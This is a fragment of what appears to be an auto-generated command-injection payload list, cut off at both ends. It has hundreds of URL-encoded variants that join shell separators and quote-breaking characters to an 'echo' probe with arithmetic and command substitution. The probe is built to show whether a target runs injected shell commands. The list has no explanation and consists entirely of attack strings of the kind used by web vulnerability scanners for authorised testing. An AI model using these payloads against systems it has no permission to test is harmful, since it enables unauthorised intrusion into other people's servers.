%2B62))$(echo%20KNBVGS)KNBVGS%27\n%26%26echo%20KJZRGW$((6%2B53))$(echo%20KJZRGW)KJZRGW%27\n%7Cecho%20WTZBYV$((78%2B41))$(echo%20WTZBYV)WTZBYV%27\n%7C%7Cecho%20MUPATQ$((93%2B5))$(echo%20MUPATQ)MUPATQ%27\necho%20FJUZMD$((40%2B24))$(echo%20FJUZMD)FJUZMD%22\n%20echo%20GTGFVS$((86%2B52))$(echo%20GTGFVS)GTGFVS%22\n;echo%20SXGZIM$((69%2B52))$(echo%20SXGZIM)SXGZIM%22\n&echo%20HJRGTK$((97%2B88))$(echo%20HJRGTK)HJRGTK%22\n|echo%20DWSCBS$((75%2B48))$(echo%20DWSCBS)DWSCBS%22\n||echo%20OVDJWG$((12%2B73))$(echo%20OVDJWG)OVDJWG%22\n&&echo%20QDULCS$((14%2B19))$(echo%20QDULCS)QDULCS%22\n%0aecho%20FBTRKX$((12%2B17))$(echo%20FBTRKX)FBTRKX%22\n%3Becho%20UZVXVR$((66%2B82))$(echo%20UZVXVR)UZVXVR%22\n%26echo%20MHDYGG$((49%2B88))$(echo%20MHDYGG)MHDYGG%22\n%26%26echo%20ZOUFKS$((71%2B23))$(echo%20ZOUFKS)ZOUFKS%22\n%7Cecho%20VKLXSK$((91%2B24))$(echo%20VKLXSK)VKLXSK%22\n%7C%7Cecho%20DQMLLV$((10%2B50))$(echo%20DQMLLV)DQMLLV%22\necho%20DAPXMM$((19%2B99))$(echo%20DAPXMM)DAPXMM%5C%5C\n%20echo%20YPJVNC$((48%2B74))$(echo%20YPJVNC)YPJVNC%5C%5C\n;echo%20HUWTGD$((19%2B3))$(echo%20HUWTGD)HUWTGD%5C%5C\n&echo%20LDMWNX$((39%2B93))$(echo%20LDMWNX)LDMWNX%5C%5C\n|echo%20WAXRWD$((80%2B57))$(echo%20WAXRWD)WAXRWD%5C%5C\n||echo%20JFXLVC$((83%2B84))$(echo%20JFXLVC)JFXLVC%5C%5C\n&&echo%20RCCBBV$((37%2B98))$(echo%20RCCBBV)RCCBBV%5C%5C\n%0aecho%20ZWEWEE$((81%2B57))$(echo%20ZWEWEE)ZWEWEE%5C%5C\n%3Becho%20ISFWLN$((61%2B53))$(echo%20ISFWLN)ISFWLN%5C%5C\n%26echo%20DFIOYS$((27%2B56))$(echo%20DFIOYS)DFIOYS%5C%5C\n%26%26echo%20JRNAMJ$((68%2B44))$(echo%20JRNAMJ)JRNAMJ%5C%5C\n%7Cecho%20YUWHXN$((65%2B16))$(echo%20YUWHXN)YUWHXN%5C%5C\n%7C%7Cecho%20JCLZPJ$((70%2B40))$(echo%20JCLZPJ)JCLZPJ%5C%5C\necho%20FVWBKZ$((56%2B38))$(echo%20FVWBKZ)FVWBKZ%2F%2F\n%20echo%20WRSAKG$((59%2B68))$(echo%20WRSAKG)WRSAKG%2F%2F\n;echo%20FFDHYG$((63%2B20))$(echo%20FFDHYG)FFDHYG%2F%2F\n&echo%20JBPWLJ$((57%2B13))$(echo%20JBPWLJ)JBPWLJ%2F%2F\n|echo%20FUUFIA$((12%2B61))$(echo%20FUUFIA)FUUFIA%2F%2F\n||echo%20HGLIQL$((80%2B19))$(echo%20HGLIQL)HGLIQL%2F%2F\n&&echo%20HMERTY$((95%2B54))$(echo%20HMERTY)HMERTY%2F%2F\n%0aecho%20HLIPMG$((9%2B10))$(echo%20HLIPMG)HLIPMG%2F%2F\n%3Becho%20WZQZMU$((55%2B24))$(echo%20WZQZMU)WZQZMU%2F%2F\n%26echo%20PAEWVB$((55%2B53))$(echo%20PAEWVB)PAEWVB%2F%2F\n%26%26echo%20PILBFC$((9%2B73))$(echo%20PILBFC)PILBFC%2F%2F\n%7Cecho%20HEMYTZ$((83%2B92))$(echo%20HEMYTZ)HEMYTZ%2F%2F\n%7C%7Cecho%20TERRZN$((57%2B89))$(echo%20TERRZN)TERRZN%2F%2F\necho%20YMGFHG$((56%2B20))$(echo%20YMGFHG)YMGFHG%26\n%20echo%20KACUJG$((17%2B57))$(echo%20KACUJG)KACUJG%26\n;echo%20JYXFUS$((22%2B98))$(echo%20JYXFUS)JYXFUS%26\n&echo%20ZMZTLJ$((97%2B61))$(echo%20ZMZTLJ)ZMZTLJ%26\n|echo%20MRVYMS$((85%2B67))$(echo%20MRVYMS)MRVYMS%26\n||echo%20CZQCUH$((88%2B14))$(echo%20CZQCUH)CZQCUH%26\n&&echo%20LDERRF$((18%2B3))$(echo%20LDERRF)LDERRF%26\n%0aecho%20BLBAVR$((79%2B49))$(echo%20BLBAVR)BLBAVR%26\n%3Becho%20BKDTSI$((78%2B91))$(echo%20BKDTSI)BKDTSI%26\n%26echo%20OGAQAD$((97%2B22))$(echo%20OGAQAD)OGAQAD%26\n%26%26echo%20BBBUFB$((63%2B41))$(echo%20BBBUFB)BBBUFB%26\n%7Cecho%20KZQFJT$((26%2B74))$(echo%20KZQFJT)KZQFJT%26\n%7C%7Cecho%20OVBFOE$((46%2B36))$(echo%20OVBFOE)OVBFOE%26\necho%20IXGYZZ$((51%2B23))$(echo%20IXGYZZ)IXGYZZ%7C\n%20echo%20NYGDLL$((82%2B79))$(echo%20NYGDLL)NYGDLL%7C\n;echo%20TDHCPF$((21%2B38))$(echo%20TDHCPF)TDHCPF%7C\n&echo%20WTDJVU$((89%2B9))$(echo%20WTDJVU)WTDJVU%7C\n|echo%20UKBANH$((70%2B33))$(echo%20UKBANH)UKBANH%7C\n||echo%20UWJWIH$((97%2B96))$(echo%20UWJWIH)UWJWIH%7C\n&&echo%20STFNSK$((89%2B70))$(echo%20STFNSK)STFNSK%7C\n%0aecho%20FDJRHK$((66%2B94))$(echo%20FDJRHK)FDJRHK%7C\n%3Becho%20DCWGLU$((82%2B36))$(echo%20DCWGLU)DCWGLU%7C\n%26echo%20SJQERK$((87%2B3))$(echo%20SJQERK)SJQERK%7C\n%26%26echo%20AWXHOA$((97%2B59))$(echo%20AWXHOA)AWXHOA%7C\n%7Cecho%20VIYOLO$((54%2B86))$(echo%20VIYOLO)VIYOLO%7C\n%7C%7Cecho%20YNEGDR$((66%2B88))$(echo%20YNEGDR)YNEGDR%7C\n&echo%20CWKFHD$((44%2B85))$(echo%20CWKFHD)CWKFHD\n&%20echo%20KETLTE$((63%2B93))$(echo%20KETLTE)KETLTE\n;echo%20VMNDNS$((4%2B99))$(echo%20VMNDNS)VMNDNS\n&echo%20SSAQOI$((4%2B7))$(echo%20SSAQOI)SSAQOI\n|echo%20XUPXZX$((83%2B57))$(echo%20XUPXZX)XUPXZX\n||echo%20NAEKVJ$((41%2B68))$(echo%20NAEKVJ)NAEKVJ\n&&echo%20MPUVIU$((4%2B26))$(echo%20MPUVIU)MPUVIU\n%0aecho%20FHNIBR$((51%2B94))$(echo%20FHNIBR)FHNIBR\n%3Becho%20SSPZUQ$((62%2B73))$(echo%20SSPZUQ)SSPZUQ\n%26echo%20DRFJEZ$((0%2B71))$(echo%20DRFJEZ)DRFJEZ\n%26%26echo%20VYNOHQ$((96%2B30))$(echo%20VYNOHQ)VYNOHQ\n%7Cecho%20KOAHWY$((4%2B67))$(echo%20KOAHWY)KOAHWY\n%7C%7Cecho%20OBGZFK$((77%2B1))$(echo%20OBGZFK)OBGZFK\necho%20RFRFQM$((78%2B19))$(echo%20RFRFQM)RFRFQM'\n%20echo%20OTWDTY$((69%2B66))$(echo%20OTWDTY)OTWDTY'\n;echo%20PSMUSP$((33%2B35))$(echo%20PSMUSP)PSMUSP'\n&echo%20MYJSKQ$((23%2B79))$(echo%20MYJSKQ)MYJSKQ'\n|echo%20OKCZRM$((7%2B40))$(echo%20OKCZRM)OKCZRM'\n||echo%20BDYSBD$((59%2B26))$(echo%20BDYSBD)BDYSBD'\n&&echo%20CALIKN$((75%2B57))$(echo%20CALIKN)CALIKN'\n%0aecho%20KYPKBG$((37%2B59))$(echo%20KYPKBG)KYPKBG'\n%3Becho%20AVWPBO$((84%2B81))$(echo%20AVWPBO)AVWPBO'\n%26echo%20HAZQII$((51%2B98))$(echo%20HAZQII)HAZQII'\n%26%26echo%20HDOQYX$((44%2B88))$(echo%20HDOQYX)HDOQYX'\n%7Cecho%20KYMYXN$((53%2B93))$(echo%20KYMYXN)KYMYXN'\n%7C%7Cecho%20BHIGBI$((12%2B1))$(echo%20BHIGBI)BHIGBI'\necho%20MIZDMG$((78%2B69))$(echo%20MIZDMG)MIZDMG\"\n%20echo%20YPBKYU$((68%2B53))$(echo%20YPBKYU)YPBKYU\"\n;echo%20KTEBYS$((87%2B50))$(echo%20KTEBYS)KTEBYS\"\n&echo%20ZJVXWJ$((77%2B27))$(echo%20ZJVXWJ)ZJVXWJ\"\n|echo%20BHRXBC$((7%2B14))$(echo%20BHRXBC)BHRXBC\"\n||echo%20MZRLUX$((2%2B69))$(echo%20MZRLUX)MZRLUX\"\n&&echo%20CKBCFD$((43%2B41))$(echo%20CKBCFD)CKBCFD\"\n%0aecho%20OJCTNP$((66%2B93))$(echo%20OJCTNP)OJCTNP\"\n%3Becho%20RYBOGB$((74%2B55))$(echo%20RYBOGB)RYBOGB\"\n%26echo%20RROLAU$((57%2B22))$(echo%20RROLAU)RROLAU\"\n%26%26echo%20QCERHI$((79%2B52))$(echo%20QCERHI)QCERHI\"\n%7Cecho%20UQZQYN$((62%2B42))$(echo%20UQZQYN)UQZQYN\"\n%7C%7Cecho%20JNIARV$((94%2B19))$(echo%20JNIARV)JNIARV\"\necho%20HDXQEJ$((71%2B79))$(echo%20HDXQEJ)HDXQEJ\n%20echo%20YNTIWO$((3%2B12))$(echo%20YNTIWO)YNTIWO\n;echo%20TKERVJ$((79%2B50))$(echo%20TKERVJ)TKERVJ\n&echo%20IWRTXC$((50%2B84))$(echo%20IWRTXC)IWRTXC\n|echo%20STRIJS$((21%2B85))$(echo%20STRIJS)STRIJS\n||echo%20MCNCTF$((18%2B60))$(echo%20MCNCTF)MCNCTF\n&&echo%20ISDEXD$((91%2B65))$(echo%20ISDEXD)ISDEXD\n%0aecho%20XSVPWX$((48%2B3))$(echo%20XSVPWX)XSVPWX\n%3Becho%20CKRVVJ$((84%2B10))$(echo%20CKRVVJ)CKRVVJ\n%26echo%20KWUNXK$((77%2B2))$(echo%20KWUNXK)KWUNXK\n%26%26echo%20KYOTEZ$((85%2B71))$(echo%20KYOTEZ)KYOTEZ\n%7Cecho%20ULTUWD$((51%2B75))$(echo%20ULTUWD)ULTUWD\n%7C%7Cecho%20KFGGEG$((58%2B43))$(echo%20KFGGEG)KFGGEG\necho%20UBUDSE$((16%2B26))$(echo%20UBUDSE)UBUDSE//\n%20echo%20KHPIMN$((0%2B66))$(echo%20KHPIMN)KHPIMN//\n;echo%20EHYWRC$((59%2B33))$(echo%20EHYWRC)EHYWRC//\n&echo%20UOYNSV$((79%2B21))$(echo%20UOYNSV)UOYNSV//\n|echo%20ZZWTRH$((46%2B12))$(echo%20ZZWTRH)ZZWTRH//\n||echo%20UTNZMD$((71%2B95))$(echo%20UTNZMD)UTNZMD//\n&&echo%20YHOOON$((42%2B16))$(echo%20YHOOON)YHOOON//\n%0aecho%20ROPVAP$((13%2B72))$(echo%20ROPVAP)ROPVAP//\n%3Becho%20NPXSTO$((33%2B52))$(echo%20NPXSTO)NPXSTO//\n%26echo%20FHCIJT$((25%2B52))$(echo%20FHCIJT)FHCIJT//\n%26%26echo%20YFZXJX$((50%2B26))$(echo%20YFZXJX)YFZXJX//\n%7Cecho%20WRHIUR$((44%2B71))$(echo%20WRHIUR)WRHIUR//\n%7C%7Cecho%20VVOSGY$((73%2B71))$(echo%20VVOSGY)VVOSGY//\necho%20NTPEFH$((79%2B40))$(echo%20NTPEFH)NTPEFH\\\n%20echo%20GQTWXI$((72%2B93))$(echo%20GQTWXI)GQTWXI\\\n;echo%20LYCBWG$((29%2B74))$(echo%20LYCBWG)LYCBWG\\\n&echo%20COCFSF$((53%2B30))$(echo%20COCFSF)COCFSF\\\n|echo%20DNZLFZ$((68%2B73))$(echo%20DNZLFZ)DNZLFZ\\\n||echo%20CHDICH$((89%2B46))$(echo%20CHDICH)CHDICH\\\n&&echo%20EOJNNV$((5%2B12))$(echo%20EOJNNV)EOJNNV\\\n%0aecho%20MTJRGS$((58%2B47))$(echo%20MTJRGS)MTJRGS\\\n%3Becho%20AXQXDI$((25%2B77))$(echo%20AXQXDI)AXQXDI\\\n%26echo%20TLKWXC$((53%2B68))$(echo%20TLKWXC)TLKWXC\\\n%26%26echo%20TTJGWL$((57%2B61))$(echo%20TTJGWL)TTJGWL\\\n%7Cecho%20SESECV$((72%2B10))$(echo%20SESECV)SESECV\\\n%7C%7Cecho%20DBIODL$((87%2B8))$(echo%20DBIODL)DBIODL\\\necho%20YBHKVY$((91%2B88))$(echo%20YBHKVY)YBHKVY&\n%20echo%20TIXAPY$((54%2B72))$(echo%20TIXAPY)TIXAPY&\n;echo%20JKKCWD$((16%2B48))$(echo%20JKKCWD)JKKCWD&\n&echo%20BVRSLI$((35%2B17))$(echo%20BVRSLI)BVRSLI&\n|echo%20VEMEGX$((63%2B29))$(echo%20VEMEGX)VEMEGX&\n||echo%20OQQCRP$((22%2B72))$(echo%20OQQCRP)OQQCRP&\n&&echo%20VNXUYU$((30%2B64))$(echo%20VNXUYU)VNXUYU&\n%0aecho%20SROSKU$((1%2B28))$(echo%20SROSKU)SROSKU&\n%3Becho%20VWPRCE$((29%2B7))$(echo%20VWPRCE)VWPRCE&\n%26echo%20WLJIPQ$((79%2B90))$(echo%20WLJIPQ)WLJIPQ&\n%26%26echo%20SSASTK$((41%2B1))$(echo%20SSASTK)SSASTK&\n%7Cecho%20PVDDDJ$((29%2B98))$(echo%20PVDDDJ)PVDDDJ&\n%7C%7Cecho%20WODZTP$((31%2B33))$(echo%20WODZTP)WODZTP&\necho%20JRBQAO$((30%2B54))$(echo%20JRBQAO)JRBQAO|\n%20echo%20LYYSLZ$((61%2B82))$(echo%20LYYSLZ)LYYSLZ|\n;echo%20SGDKKT$((60%2B36))$(echo%20SGDKKT)SGDKKT|\n&echo%20SRNNCB$((90%2B39))$(echo%20SRNNCB)SRNNCB|\n|echo%20LCIJBI$((90%2B7))$(echo%20LCIJBI)LCIJBI|\n||echo%20HRBLJP$((7%2B73))$(echo%20HRBLJP)HRBLJP|\n&&echo%20ELOSZQ$((77%2B50))$(echo%20ELOSZQ)ELOSZQ|\n%0aecho%20SGYETR$((24%2B19))$(echo%20SGYETR)SGYETR|\n%3Becho%20TJXONB$((49%2B24))$(echo%20TJXONB)TJXONB|\n%26echo%20YCRSFZ$((33%2B21))$(echo%20YCRSFZ)YCRSFZ|\n%26%26echo%20UWWCWD$((83%2B98))$(echo%20UWWCWD)UWWCWD|\n%7Cecho%20XJGESW$((2%2B77))$(echo%20XJGESW)XJGESW|\n%7C%7Cecho%20QBEEHF$((22%2B49))$(echo%20QBEEHF)QBEEHF|\necho%20TWRCSC$((11%2B79))$(echo%20TWRCSC)TWRCSC%27\n%20echo%20UTDRGU$((88%2B93))$(echo%20UTDRGU)UTDRGU%27\n;echo%20KMAFWV$((53%2B22))$(echo%20KMAFWV)KMAFWV%27\n&echo%20WYAISD$((66%2B10))$(echo%20WYAISD)WYAISD%27\n|echo%20EEPGGY$((39%2B86))$(echo%20EEPGGY)EEPGGY%27\n||echo%20CSDAYB$((1%2B92))$(echo%20CSDAYB)CSDAYB%27\n&&echo%20GHXSEE$((91%2B16))$(echo%20GHXSEE)GHXSEE%27\n%0aecho%20JLCIIE$((76%2B4))$(echo%20JLCIIE)JLCIIE%27\n%3Becho%20KTVSOY$((3%2B81))$(echo%20KTVSOY)KTVSOY%27\n%26echo%20NPROKF$((49%2B32))$(echo%20NPROKF)NPROKF%27\n%26%26echo%20TQYXWB$((55%2B46))$(echo%20TQYXWB)TQYXWB%27\n%7Cecho%20TAQPYI$((0%2B30))$(echo%20TAQPYI)TAQPYI%27\n%7C%7Cecho%20EMZGLE$((57%2B51))$(echo%20EMZGLE)EMZGLE%27\necho%20VDJOCF$((50%2B82))$(echo%20VDJOCF)VDJOCF%22\n%20echo%20UDTOAM$((20%2B61))$(echo%20UDTOAM)UDTOAM%22\n;echo%20BUUBFP$((84%2B64))$(echo%20BUUBFP)BUUBFP%22\n&echo%20ZCQYVF$((95%2B44))$(echo%20ZCQYVF)ZCQYVF%22\n|echo%20JRKNBQ$((94%2B67))$(echo%20JRKNBQ)JRKNBQ%22\n||echo%20AHERUV$((2%2B2))$(echo%20AHERUV)AHERUV%22\n&&echo%20PSXDYR$((30%2B29))$(echo%20PSXDYR)PSXDYR%22\n%0aecho%20QDWRHU$((33%2B84))$(echo%20QDWRHU)QDWRHU%22\n%3Becho%20MUYISP$((6%2B57))$(echo%20MUYISP)MUYISP%22\n%26echo%20AUFDNI$((4%2B13))$(echo%20AUFDNI)AUFDNI%22\n%26%26echo%20KEKCUX$((55%2B27))$(echo%20KEKCUX)KEKCUX%22\n%7Cecho%20PUCKTG$((40%2B18))$(echo%20PUCKTG)PUCKTG%22\n%7C%7Cecho%20SPDMBT$((54%2B37))$(echo%20SPDMBT)SPDMBT%22\necho%20WHLWIO$((67%2B20))$(echo%20WHLWIO)WHLWIO%5C%5C\n%20echo%20VZZWBN$((81%2B34))$(echo%20VZZWBN)VZZWBN%5C%5C\n;echo%20HMKHHL$((82%2B49))$(echo%20HMKHHL)HMKHHL%5C%5C\n&echo%20ZBAFWV$((66%2B6))$(echo%20ZBAFWV)ZBAFWV%5C%5C\n|echo%20UKNYWO$((51%2B97))$(echo%20UKNYWO)UKNYWO%5C%5C\n||echo%20NIGBVP$((58%2B3))$(echo%20NIGBVP)NIGBVP%5C%5C\n&&echo%20IIQUKI$((89%2B19))$(echo%20IIQUKI)IIQUKI%5C%5C\n%0aecho%20ARNNHW$((53%2B8))$(echo%20ARNNHW)ARNNHW%5C%5C\n%3Becho%20GDQLRU$((11%2B47))$(echo%20GDQLRU)GDQLRU%5C%5C\n%26echo%20GVMHYL$((95%2B75))$(echo%20GVMHYL)GVMHYL%5C%5C\n%26%26echo%20ZIFPOD$((88%2B33))$(echo%20ZIFPOD)ZIFPOD%5C%5C\n%7Cecho%20CSSFWU$((98%2B21))$(echo%20CSSFWU)CSSFWU%5C%5C\n%7C%7Cecho%20PWFAGG$((70%2B41))$(echo%20PWFAGG)PWFAGG%5C%5C\necho%20VWXGBL$((23%2B33))$(echo%20VWXGBL)VWXGBL%2F%2F\n%20echo%20QZBSFJ$((43%2B35))$(echo%20QZBSFJ)QZBSFJ%2F%2F\n;echo%20ARXZSC$((51%2B16))$(echo%20ARXZSC)ARXZSC%2F%2F\n&echo%20EDOOGB$((28%2B29))$(echo%20EDOOGB)EDOOGB%2F%2F\n|echo%20ELJTMV$((55%2B23))$(echo%20ELJTMV)ELJTMV%2F%2F\n||echo%20HVNHYL$((74%2B86))$(echo%20HVNHYL)HVNHYL%2F%2F\n&&echo%20KYHFUU$((41%2B61))$(echo%20KYHFUU)KYHFUU%2F%2F\n%0aecho%20COCDTZ$((30%2B94))$(echo%20COCDTZ)COCDTZ%2F%2F\n%3Becho%20FOTFWD$((3%2B5))$(echo%20FOTFWD)FOTFWD%2F%2F\n%26echo%20UUQPGU$((66%2B46))$(echo%20UUQPGU)UUQPGU%2F%2F\n%26%26echo%20CJDFNU$((77%2B46))$(echo%20CJDFNU)CJDFNU%2F%2F\n%7Cecho%20VUMPEC$((81%2B13))$(echo%20VUMPEC)VUMPEC%2F%2F\n%7C%7Cecho%20XJVKTW$((99%2B70))$(echo%20XJVKTW)XJVKTW%2F%2F\necho%20LFNYYO$((14%2B97))$(echo%20LFNYYO)LFNYYO%26\n%20echo%20IIDCDJ$((38%2B91))$(echo%20IIDCDJ)IIDCDJ%26\n;echo%20TLPKYY$((25%2B59))$(echo%20TLPKYY)TLPKYY%26\n&echo%20QPWISS$((90%2B73))$(echo%20QPWISS)QPWISS%26\n|echo%20NAEDRV$((86%2B62))$(echo%20NAEDRV)NAEDRV%26\n||echo%20TUAKKW$((59%2B81))$(echo%20TUAKKW)TUAKKW%26\n&&echo%20RYKJGR$((75%2B28))$(echo%20RYKJGR)RYKJGR%26\n%0aecho%20BJMVLS$((87%2B51))$(echo%20BJMVLS)BJMVLS%26\n%3Becho%20DCOSDU$((41%2B86))$(echo%20DCOSDU)DCOSDU%26\n%26echo%20ZPNTLA$((40%2B1))$(echo%20ZPNTLA)ZPNTLA%26\n%26%26echo%20YAEFHT$((74%2B26))$(echo%20YAEFHT)YAEFHT%26\n%7Cecho%20AFLTJA$((66%2B14))$(echo%20AFLTJA)AFLTJA%26\n%7C%7Cecho%20ITSQLY$((14%2B91))$(echo%20ITSQLY)ITSQLY%26\necho%20KEIBVO$((81%2B19))$(echo%20KEIBVO)KEIBVO%7C\n%20echo%20CXGLRL$((92%2B49))$(echo%20CXGLRL)CXGLRL%7C\n;echo%20UQHDID$((15%2B76))$(echo%20UQHDID)UQHDID%7C\n&echo%20XDZINA$((98%2B93))$(echo%20XDZINA)XDZINA%7C\n|echo%20RGHPOG$((64%2B34))$(echo%20RGHPOG)RGHPOG%7C\n||echo%20HYCXDP$((54%2B7))$(echo%20HYCXDP)HYCXDP%7C\n&&echo%20SIYJRM$((59%2B4))$(echo%20SIYJRM)SIYJRM%7C\n%0aecho%20KEARQO$((52%2B94))$(echo%20KEARQO)KEARQO%7C\n%3Becho%20GBWBWQ$((60%2B85))$(echo%20GBWBWQ)GBWBWQ%7C\n%26echo%20LPHFGP$((58%2B11))$(echo%20LPHFGP)LPHFGP%7C\n%26%26echo%20VTKJBN$((70%2B38))$(echo%20VTKJBN)VTKJBN%7C\n%7Cecho%20MRVLAB$((69%2B71))$(echo%20MRVLAB)MRVLAB%7C\n%7C%7Cecho%20RAGAAW$((48%2B7))$(echo%20RAGAAW)RAGAAW%7C\n%27echo%20XBOYVS$((29%2B20))$(echo%20XBOYVS)XBOYVS\n%27%20echo%20GZAUTK$((17%2B45))$(echo%20GZAUTK)GZAUTK\n%27;echo%20IETDFJ$((93%2B90))$(echo%20IETDFJ)IETDFJ\n%27&echo%20NUBYOC$((86%2B87))$(echo%20NUBYOC)NUBYOC\n%27|echo%20MXSHQC$((54%2B42))$(echo%20MXSHQC)MXSHQC\n%27||echo%20FQFYSL$((20%2B12))$(echo%20FQFYSL)FQFYSL\n%27&&echo%20SIPRCW$((44%2B64))$(echo%20SIPRCW)SIPRCW\n%27%0aecho%20LDYDEO$((70%2B78))$(echo%20LDYDEO)LDYDEO\n%27%3Becho%20GCPNLC$((57%2B96))$(echo%20GCPNLC)GCPNLC\n%27%26echo%20SAULFA$((96%2B72))$(echo%20SAULFA)SAULFA\n%27%26%26echo%20LPSXXC$((9%2B32))$(echo%20LPSXXC)LPSXXC\n%27%7Cecho%20PELCUD$((9%2B37))$(echo%20PELCUD)PELCUD\n%27%7C%7Cecho%20KXXNLE$((80%2B57))$(echo%20KXXNLE)KXXNLE\n%27echo%20IOXVNX$((62%2B78))$(echo%20IOXVNX)IOXVNX'\n%27%20echo%20QKGHPD$((17%2B97))$(echo%20QKGHPD)QKGHPD'\n%27;echo%20YEDGRB$((80%2B41))$(echo%20YEDGRB)YEDGRB'\n%27&echo%20RIAXZB$((29%2B3))$(echo%20RIAXZB)RIAXZB'\n%27|echo%20EFMWXH$((10%2B86))$(echo%20EFMWXH)EFMWXH'\n%27||echo%20KKZKEG$((23%2B59))$(echo%20KKZKEG)KKZKEG'\n%27&&echo%20UDRFXR$((61%2B32))$(echo%20UDRFXR)UDRFXR'\n%27%0aecho%20KAJBJB$((99%2B88))$(echo%20KAJBJB)KAJBJB'\n%27%3Becho%20MHQWAF$((29%2B52))$(echo%20MHQWAF)MHQWAF'\n%27%26echo%20NTKAFT$((47%2B6))$(echo%20NTKAFT)NTKAFT'\n%27%26%26echo%20GAYYAM$((19%2B9))$(echo%20GAYYAM)GAYYAM'\n%27%7Cecho%20TQBVPR$((29%2B56))$(echo%20TQBVPR)TQBVPR'\n%27%7C%7Cecho%20JQLWQP$((26%2B32))$(echo%20JQLWQP)JQLWQP'\n%27echo%20IOMPVA$((3%2B97))$(echo%20IOMPVA)IOMPVA\"\n%27%20echo%20BZYOZX$((41%2B40))$(echo%20BZYOZX)BZYOZX\"\n%27;echo%20FIMTOH$((82%2B28))$(echo%20FIMTOH)FIMTOH\"\n%27&echo%20YHYEFI$((32%2B68))$(echo%20YHYEFI)YHYEFI\"\n%27|echo%20BLYANI$((69%2B87))$(echo%20BLYANI)BLYANI\"\n%27||echo%20YELBOD$((58%2B80))$(echo%20YELBOD)YELBOD\"\n%27&&echo%20THTPHV$((84%2B16))$(echo%20THTPHV)THTPHV\"\n%27%0aecho%20DHXPBN$((74%2B0))$(echo%20DHXPBN)DHXPBN\"\n%27%3Becho%20YXEFFV$((66%2B19))$(echo%20YXEFFV)YXEFFV\"\n%27%26echo%20SQFUZG$((87%2B17))$(echo%20SQFUZG)SQFUZG\"\n%27%26%26echo%20RFPIMF$((21%2B62))$(echo%20RFPIMF)RFPIMF\"\n%27%7Cecho%20URCXUV$((95%2B4))$(echo%20URCXUV)URCXUV\"\n%27%7C%7Cecho%20HFJBUM$((87%2B87))$(echo%20HFJBUM)HFJBUM\"\n%27echo%20CPHNYZ$((5%2B38))$(echo%20CPHNYZ)CPHNYZ\n%27%20echo%20IVJQAB$((70%2B54))$(echo%20IVJQAB)IVJQAB\n%27;echo%20CWXAYU$((62%2B81))$(echo%20CWXAYU)CWXAYU\n%27&echo%20SIOGAT$((82%2B21))$(echo%20SIOGAT)SIOGAT\n%27|echo%20GXDPVN$((69%2B6))$(echo%20GXDPVN)GXDPVN\n%27||echo%20ULPNTA$((21%2B48))$(echo%20ULPNTA)ULPNTA\n%27&&echo%20LIFOQJ$((22%2B86))$(echo%20LIFOQJ)LIFOQJ\n%27%0aecho%20LSICCV$((22%2B94))$(echo%20LSICCV)LSICCV\n%27%3Becho%20MYVNVT$((42%2B57))$(echo%20MYVNVT)MYVNVT\n%27%26echo%20SFPNFW$((13%2B14))$(echo%20SFPNFW)SFPNFW\n%27%26%26echo%20XOEQUO$((65%2B74))$(echo%20XOEQUO)XOEQUO\n%27%7Cecho%20JZJOSI$((32%2B42))$(echo%20JZJOSI)JZJOSI\n%27%7C%7Cecho%20GQLDDF$((67%2B97))$(echo%20GQLDDF)GQLDDF\n%27echo%20QFGAIQ$((42%2B15))$(echo%20QFGAIQ)QFGAIQ//\n%27%20echo%20EGNSNW$((91%2B88))$(echo%20EGNSNW)EGNSNW//\n%27;echo%20BXNDAG$((17%2B65))$(echo%20BXNDAG)BXNDAG//\n%27&echo%20DUJCYR$((3%2B43))$(echo%20DUJCYR)DUJCYR//\n%27|echo%20XXJDRI$((78%2B40))$(echo%20XXJDRI)XXJDRI//\n%27||echo%20RTVDXH$((26%2B45))$(echo%20RTVDXH)RTVDXH//\n%27&&echo%20DZOCJQ$((86%2B39))$(echo%20DZOCJQ)DZOCJQ//\n%27%0aecho%20IKZDMH$((10%2B92))$(echo%20IKZDMH)IKZDMH//\n%27%3Becho%20YSASGM$((95%2B50))$(echo%20YSASGM)YSASGM//\n%27%26echo%20TSJQIY$((55%2B20))$(echo%20TSJQIY)TSJQIY//\n%27%26%26echo%20ALGYVZ$((76%2B83))$(echo%20ALGYVZ)ALGYVZ//\n%27%7Cecho%20GCKHEE$((25%2B33))$(echo%20GCKHEE)GCKHEE//\n%27%7C%7Cecho%20IJHDBG$((39%2B40))$(echo%20IJHDBG)IJHDBG//\n%27echo%20RMKRIK$((54%2B62))$(echo%20RMKRIK)RMKRIK\\\n%27%20echo%20FRIWEP$((93%2B33))$(echo%20FRIWEP)FRIWEP\\\n%27;echo%20HPMAEK$((9%2B6))$(echo%20HPMAEK)HPMAEK\\\n%27&echo%20GPEMQS$((51%2B70))$(echo%20GPEMQS)GPEMQS\\\n%27|echo%20YDDQHZ$((64%2B41))$(echo%20YDDQHZ)YDDQHZ\\\n%27||echo%20SBOJIW$((28%2B58))$(echo%20SBOJIW)SBOJIW\\\n%27&&echo%20QINFDZ$((25%2B98))$(echo%20QINFDZ)QINFDZ\\\n%27%0aecho%20LJFJVH$((10%2B34))$(echo%20LJFJVH)LJFJVH\\\n%27%3Becho%20AWVIEM$((26%2B50))$(echo%20AWVIEM)AWVIEM\\\n%27%26echo%20PCODKZ$((48%2B2))$(echo%20PCODKZ)PCODKZ\\\n%27%26%26echo%20SLPZUK$((69%2B4))$(echo%20SLPZUK)SLPZUK\\\n%27%7Cecho%20GZDPZK$((6%2B29))$(echo%20GZDPZK)GZDPZK\\\n%27%7C%7Cecho%20YEMQVY$((61%2B88))$(echo%20YEMQVY)YEMQVY\\\n%27echo%20TKPBHT$((87%2B27))$(echo%20TKPBHT)TKPBHT&\n%27%20echo%20VEQJIY$((50%2B4))$(echo%20VEQJIY)VEQJIY&\n%27;echo%20WMMUXQ$((27%2B51))$(echo%20WMMUXQ)WMMUXQ&\n%27&echo%20BJUNBG$((90%2B77))$(echo%20BJUNBG)BJUNBG&\n%27|echo%20WEYPRV$((18%2B9))$(echo%20WEYPRV)WEYPRV&\n%27||echo%20HVWYSC$((52%2B13))$(echo%20HVWYSC)HVWYSC&\n%27&&echo%20ZUDZMD$((43%2B75))$(echo%20ZUDZMD)ZUDZMD&\n%27%0aecho%20YJUICB$((52%2B55))$(echo%20YJUICB)YJUICB&\n%27%3Becho%20ICUPEK$((37%2B11))$(echo%20ICUPEK)ICUPEK&\n%27%26echo%20PAFSCK$((22%2B53))$(echo%20PAFSCK)PAFSCK&\n%27%26%26echo%20VFVJGA$((34%2B26))$(echo%20VFVJGA)VFVJGA&\n%27%7Cecho%20PEBEOY$((43%2B44))$(echo%20PEBEOY)PEBEOY&\n%27%7C%7Cecho%20ETYFQP$